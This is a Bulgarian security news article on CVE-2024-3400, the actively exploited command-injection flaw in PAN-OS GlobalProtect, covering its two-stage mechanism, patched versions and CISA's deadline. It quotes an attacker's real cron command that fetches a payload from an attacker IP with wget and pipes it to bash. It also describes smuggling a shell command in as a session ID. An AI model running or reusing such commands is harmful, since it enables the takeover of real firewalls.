Palo Alto Networks разкри повече подробности за критичния недостатък на PAN-OS

Palo Alto Networks сподели повече подробности за критичен недостатък в сигурността на PAN-OS, който се експлоатира активно от злонамерени хакери.

Компанията описва уязвимостта, проследена като CVE-2024-3400 (CVSS score: 10.0), като „сложна“ и представляваща комбинация от две грешки във версиите PAN-OS 10.2, PAN-OS 11.0 и PAN-OS 11.1 на софтуера.

„При първата от тях услугата GlobalProtect не е валидирала в достатъчна степен формата на идентификаторите на сесиите, преди да ги съхрани. Това позволи на нападателя да съхрани празен файл с избрано от него име“, казва Чандан Б. Н., старши директор по продуктова сигурност в Palo Alto Networks.

„Вторият бъг (доверяващ се на това, че файловете са генерирани от системата) използваше имената на файловете като част от команда.“

Струва си да се отбележи, че макар нито един от проблемите да не е достатъчно критичен сам по себе си, когато са верижно свързани, те могат да доведат до неавтентифицирано изпълнение на отдалечена шел команда.

От Palo Alto Networks заявиха, че извършителят, който стои зад експлоатирането на дефекта от нулев ден, UTA0218, е извършил двуетапна атака, за да постигне изпълнение на команди на податливи устройства. Дейността се проследява под името Операция MidnightEclipse.

Както вече беше разкрито както от Volexity, така и от собственото подразделение за разузнаване на заплахи Unit 42 на компанията за мрежова сигурност, това включва изпращане на специално подготвени заявки, съдържащи командата, която трябва да бъде изпълнена, и която след това се изпълнява чрез задна врата, наречена UPSTYLE.

„Първоначалният механизъм за устойчивост, създаден от UTA0218, включваше конфигуриране на cron job, който използваше wget за извличане на полезен товар от контролиран от атакуващия URL адрес, като изходът му се записваше в stdout и се изпращаше в bash за изпълнение“, отбеляза Volexity миналата седмица.

PAN-OS Flaw Under Attack

„Нападателят е използвал този метод, за да разположи и изпълни конкретни команди и да изтегли инструменти за обратен прокси сървър, като например GOST (GO Simple Tunnel).“

Unit 42  заяви, че не е успяло да определи командите, изпълнени чрез този механизъм – wget -qO- hxxp://172.233.228[.]93/policy | bash – но прецени, че имплантът, базиран на задачи cron, вероятно е използван за извършване на дейности след експлоатирането.

„На етап 1 нападателят изпраща на GlobalProtect внимателно подготвена команда на шел вместо валиден идентификатор на сесия“, обясни Чандан. „Това води до създаване на празен файл в системата с вградена команда като име на файла, избрано от нападателя.“

„На етап 2 нищо неподозиращо планирано системно задание, което се изпълнява редовно, използва предоставеното от атакуващия име на файла в команда. Това води до изпълнение на предоставената от атакуващия команда с повишени привилегии.“

Макар че Palo Alto Networks първоначално отбеляза, че успешното използване на CVE-2024-3400 изисква да бъдат активирани конфигурациите на защитната стена за GlobalProtect gateway или GlobalProtect portal (или и двете) и телеметрията на устройствата, впоследствие компанията потвърди, че телеметрията на устройствата няма отношение към проблема.

 

Това се основава на новите открития на Bishop Fox, които откриха заобиколни пътища за използване на дефекта, така че да не се изисква включването на телеметрия в устройството, за да се проникне в него.

През последните няколко дни компанията също така разшири кръпките за дефекта извън основните версии, за да обхване и други често използвани версии за поддръжка –

  • PAN-OS 10.2.9-h1
  • PAN-OS 10.2.8-h3
  • PAN-OS 10.2.7-h8
  • PAN-OS 10.2.6-h3
  • PAN-OS 10.2.5-h6
  • PAN-OS 10.2.4-h16
  • PAN-OS 10.2.3-h13
  • PAN-OS 10.2.2-h5
  • PAN-OS 10.2.1-h2
  • PAN-OS 10.2.0-h3
  • PAN-OS 11.0.4-h1
  • PAN-OS 11.0.4-h2
  • PAN-OS 11.0.3-h10
  • PAN-OS 11.0.2-h4
  • PAN-OS 11.0.1-h4
  • PAN-OS 11.0.0-h3
  • PAN-OS 11.1.2-h3
  • PAN-OS 11.1.1-h1
  • PAN-OS 11.1.0-h3

С оглед на активната злоупотреба с CVE-2024-3400 и наличието на код за експлойт с доказана концепция (PoC), на потребителите се препоръчва да предприемат стъпки за прилагане на горещите поправки възможно най-скоро, за да се предпазят от потенциални заплахи.

Американската агенция за киберсигурност и инфраструктурна сигурност (CISA) също добави недостатъка в своя каталог на известните експлоатирани уязвимости (KEV), като нареди на федералните агенции да защитят своите устройства до 19 април 2024 г.

Според информация, споделена от Shadowserver Foundation, приблизително 22 542 устройства за защитна стена, изложени на риск в интернет, вероятно са уязвими към CVE-2024-3400. По-голямата част от устройствата се намират в САЩ, Япония, Индия, Германия, Великобритания, Канада, Австралия, Франция и Китай към 18 април 2024 г.

Palo Alto Networks

The Hacker News

Подобни

Apple коригира zero-day уязвимост в dyld
12.02.2026
apple-7446229_640
Критична уязвимост в AI-Notepad за Windows 11
11.02.2026
block-4914911_640
Microsoft разследва срив, блокиращ достъпа до Microsoft 365 Admin Center
11.02.2026
Microsoft-Office-365
Microsoft пусна Windows 11 KB5077181 и KB5075941
11.02.2026
windows-11-6377156_1280
Microsoft пусна Windows 10 KB5075912 с критични корекции
11.02.2026
windows-10-1535765_1280
Microsoft разследва сериозен инцидент в Exchange Online
10.02.2026
how-to-outlook

Споделете

Facebook
LinkedIn

Бюлетин

С нашия бюлетин ще бъдеш сред първите, които научават за нови заплахи, практични решения и добри практики. Напълно безплатно и с грижа за твоята сигурност.

Популярни

Изземване на Zamunda, Arena и други торент сайтове
30.01.2026
seizure
Измамническите сайтове в България: как да ги разпознаем, проверим и защитим себе си
6.10.2025
bulgaria3
Вишинг измами срещу потребители на Revolut
11.12.2025
revolut
Социалните мрежи и младите - между канализиране на общественото мнение и манипулация
7.12.2025
spasov

Бъди в крак с киберсигурността

Абонирай се за нашия бюлетин и получавай директно в пощата си най-важните новини, експертни съвети и практически насоки за киберхигиена и защита онлайн. Кратко, полезно и без спам.